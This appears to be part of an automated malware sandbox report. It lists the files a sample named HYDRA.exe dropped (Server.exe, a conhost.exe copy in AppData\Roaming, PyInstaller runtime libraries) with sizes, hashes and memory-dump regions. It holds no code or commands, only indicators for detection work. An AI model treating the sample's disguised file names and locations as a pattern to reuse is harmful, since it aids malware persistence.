dc087ba8e9603533bc780906b34f350728bda86c980e47fa9eaa1bf77baf4c4df75af514135665f99f99e4d475ed512a415ed756b30bae39e29813ca49ae3391

Download Submit
C:\Users\Admin\AppData\Local\Temp\HYDRA.exe

Filesize
227KB

MD5
224f803df5b876b23c002f19f74aafac

SHA1
6b265b9921fed98a4d3b9a8e72f26914ed154de8

SHA256
f8d8aa95aa4205ac48cf654af602563bef92848b92129b07c5f402816d3d04dc

SHA512
2df0cd2db55fce534ac6b65afacc121c21b5c105d24d2c6c036b5225e86e97833b2281f205b1435e2c1800ddeeb0f597d0a0fdf83887421259043402487c43b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Server.exe

Filesize
71KB

MD5
f9b08bd21b40a938122b479095b7c70c

SHA1
eb925e3927b83c20d8d24bdab2e587c10d6ac8cd

SHA256
c96cde2e96021c266a202286d644ceb28543d6347e21006d72b29b8a72c505e8

SHA512
fcc5784936b7f85a550883c472b99b5edfa7e5c6fd3872fd806b81c2ce1f195ca34342b230a89456066885579fe55aea46d91074ac08af192fbd04ea158473ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI51082\VCRUNTIME140.dll

Filesize
87KB

MD5
0e675d4a7a5b7ccd69013386793f68eb

SHA1
6e5821ddd8fea6681bda4448816f39984a33596b

SHA256
bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1

SHA512
cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI51082\_ctypes.pyd

Filesize
129KB

MD5
2f21f50d2252e3083555a724ca57b71e

SHA1
49ec351d569a466284b8cc55ee9aeaf3fbf20099

SHA256
09887f07f4316057d3c87e3a907c2235dc6547e54ed4f5f9125f99e547d58bce

SHA512
e71ff1e63105f51a4516498cd09f8156d7208758c5dc9a74e7654844e5cefc6e84f8fe98a1f1bd7a459a98965fbe913cb5edb552fffa1e33dfda709f918dddeb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI51082\_hashlib.pyd

Filesize
38KB

MD5
c3b19ad5381b9832e313a448de7c5210

SHA1
51777d53e1ea5592efede1ed349418345b55f367

SHA256
bdf4a536f783958357d2e0055debdc3cf7790ee28beb286452eec0354a346bdc

SHA512
7f8d3b79a58612e850d18e8952d14793e974483c688b5daee217baaa83120fd50d1e036ca4a1b59d748b22951744377257d2a8f094a4b4de1f79fecd4bf06afb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI51082\_socket.pyd

Filesize
74KB

MD5
d7e7a7592338ce88e131f858a84deec6

SHA1
3add8cd9fbbf7f5fa40d8a972d9ac18282dcf357

SHA256
4ba5d0e236711bdcb29ce9c3138406f7321bd00587b6b362b4ace94379cf52d5

SHA512
96649296e8ccdc06d6787902185e21020a700436fc7007b2aa6464d0af7f9eb66a4485b3d46461106ac5f1d35403183daa1925e842e7df6f2db9e3e833b18fb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI51082\base_library.zip

Filesize
766KB

MD5
c7f6b1e71737274de654099f1a483896

SHA1
6cf5965a8efb64443dc654c6b9953eacb314daca

SHA256
d982c24bbc242b3cc0094ee3685fba79297f3893d354293d4c33ccfd431dfb1d

SHA512
3b196ecb376f02b900b581d98d347d22d89d34b502a46770493663e48f9d7eee4b42acb16181b441026ae1634638faa14e4ebd814e05ccaf2b965aa2a5b5179c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI51082\libcrypto-1_1-x64.dll

Filesize
2.4MB

MD5
022a61849adab67e3a59bcf4d0f1c40b

SHA1
fca2e1e8c30767c88f7ab5b42fe2bd9abb644672

SHA256
2a57183839c3e9cc4618fb1994c40e47672a8b6daffaa76c5f89cf2542b02c2f

SHA512
94ac596181f0887af7bf02a7ce31327ad443bb7fe2d668217953e0f0c782d19296a80de965008118708afd9bda14fd8c78f49785ebf7abcc37d166b692e88246

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI51082\python37.dll

Filesize
3.7MB

MD5
62125a78b9be5ac58c3b55413f085028

SHA1
46c643f70dd3b3e82ab4a5d1bc979946039e35b2

SHA256
17c29e6188b022f795092d72a1fb58630a7c723d70ac5bc3990b20cd2eb2a51f

SHA512
e63f4aa8fc5cd1569ae401e283bc8e1445859131eb0db76581b941f1085670c549cbc3fedf911a21c1237b0f3f66f62b10c60e88b923fa058f7fafee18dd0fa4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI51082\select.pyd

Filesize
26KB

MD5
c30e5eccf9c62b0b0bc57ed591e16cc0

SHA1
24aece32d4f215516ee092ab72471d1e15c3ba24

SHA256
56d1a971762a1a56a73bdf64727e416ffa9395b8af4efcd218f5203d744e1268

SHA512
3e5c58428d4c166a3d6d3e153b46c4a57cca2e402001932ec90052c4689b7f5ba4c5f122d1a66d282b2a0a0c9916dc5a5b5e5f6dfc952cdb62332ac29cb7b36a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfuvx1rl.esr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Server.exe

Filesize
23KB

MD5
32fe01ccb93b0233503d0aaaa451f7b2

SHA1
58e5a63142150e8fb175dbb4dedea2ce405d7db0

SHA256
6988ee719a54c93a89303dcff277c62ae4890274cc45f074bc7effde315fbf43

SHA512
76945f23a49d594e325d80ffc0570341044ac0b97bd889c92f90bc56d3cdff5c1b29178be4f157c8c1bb9ce7cc311765309f2e6f7b08b24e7acf983ea67635a6

Download Submit
C:\Users\Admin\AppData\Roaming\conhost.exe

Filesize
37KB

MD5
b37dd1a1f0507baf993471ae1b7a314c

SHA1
9aff9d71492ffff8d51f8e8d67f5770755899882

SHA256
e58e8918a443c0061add029f8f211f6551a130202195cc2b9b529ea72553e0bc

SHA512
ac76d5b10540eb292341f30c7abfd81f03be65f6655c814aba6ac6a0ecf4f0f2c34c3b8e63ceef8c4579f98b7459e51b9fdd30d601c6d1930860ab7c154da460

Download Submit
memory/1816-57-0x00000000005F0000-0x0000000000600000-memory.dmp

Filesize
64KB

Download
memory/2156-58-0x00007FFB51DC0000-0x00007FFB52881000-memory.dmp

Filesize
10.8MB

Download
memory/2156-0-0x00007FFB51DC3000-0x00007FFB51DC5000-memory.dmp

Filesize
8KB

Download
memory/2156-10-0x00007FFB51DC0000-0x00007FFB52881000-memory.dmp

Filesize
10.8MB

Download
memory/2156-1-0x0000000000430000-0x000000000098C000-memory.dmp

Filesize
5.4MB

Download
memory/3820-92-0x00000285ED120000-0x00000285ED142000-memory.dmp

Filesize
136KB

Download
memory/4296-59-0x00007FFB51DC0000-0x00007FFB52881000-memory.dmp

Filesize
10.8MB

Download
memory/4296-26-0x00007FFB51DC0000-0x00007FFB52881000-memory.dmp

Filesize
10.8MB

Download
memory/4296-27-0x00000000005D0000-0x00000000005E8000-memory.dmp

Filesize
96KB

Download
memory/4488-162-0x000001B86B9D0000-0x000001B86BA46000-memory.dmp

Filesize
472KB

Download
memory/4488-163-0x000001B86B950000-0x000001B86B9A0000-memory.dmp

Filesize
320KB

Download
memory/4488-164-0x000001B852FE0000-0x000001B852FFE000-memory.dmp

Filesize
120KB

Download
memory/4488-28-0x00007FFB51DC0000-0x00007FFB52881000-memory.dmp

Filesize
10.8MB

Download
memory/4488-201-0x000001B853020000-0x000001B85302A000-memory.dmp

Filesize
40KB

Download
memory/4488-202-0x000001B86BA50000-0x000001B86BA62000-memory.dmp

Filesize
72KB

Download
memory/4488-25-0x000001B851240000-0x000001B851280000-memory.dmp

Filesize
256KB

Download
memory/4488-229-0x00007FFB51DC0000-0x00007FFB52881000-memory.dmp

Filesize
10.8MB

Download